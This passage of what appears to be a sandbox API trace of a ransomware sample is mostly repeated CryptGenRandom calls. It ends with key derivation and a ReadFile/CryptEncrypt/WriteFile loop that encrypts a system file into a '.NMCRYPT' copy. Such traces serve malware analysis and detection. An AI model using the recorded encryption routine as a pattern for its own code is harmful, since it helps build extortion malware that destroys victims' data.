pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.344] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0151.344] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0151.346] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444944 | out: phHash=0x1d444944) returned 1 [0151.346] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0151.346] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444948 | out: phKey=0x1d444948*=0x9ad838) returned 1 [0151.346] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0151.346] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0151.346] wcslen (_String="\\\\?\\") returned 0x4 [0151.346] CryptDuplicateKey (in: hKey=0x9ad838, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad878) returned 1 [0151.346] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0151.346] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0151.347] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=5632) returned 1 [0151.347] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.348] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.348] GetLastError () returned 0x0 [0151.348] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.363] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.363] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.363] GetLastError () returned 0x0 [0151.363] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.363] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.363] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.363] GetLastError () returned 0x0 [0151.363] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.363] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.363] CryptEncrypt (in: hKey=0x9ad878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.363] GetLastError () returned 0x0 [0151.363] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: 